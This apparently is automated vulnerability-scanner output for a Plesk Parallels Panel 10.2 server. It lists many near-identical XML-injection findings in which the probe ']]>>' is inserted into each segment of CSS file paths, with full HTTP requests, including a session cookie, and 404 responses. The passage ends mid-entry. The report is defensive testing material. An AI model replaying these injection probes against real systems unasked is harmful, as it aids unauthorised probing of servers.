GET /skins]]>>/default/plesk/css/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/ie.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:23 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/ie.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:25 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/ie.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/ie.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/ie.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:30 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/left/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:21 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/left/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:23 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/left/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:25 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/left/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/left]]>>/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:30 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/custom.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/left/custom.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:32 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/left/layout.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:21 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/left/layout.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:23 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/left/layout.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:25 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/left/layout.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/left]]>>/layout.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:29 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/left/layout.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/left/layout.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:32 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/apps-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/apps-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/apps-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:10 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/apps-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:12 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/apps-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/apps-control.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/apps-control.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:16 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/buttons.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:09 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/buttons.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:11 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
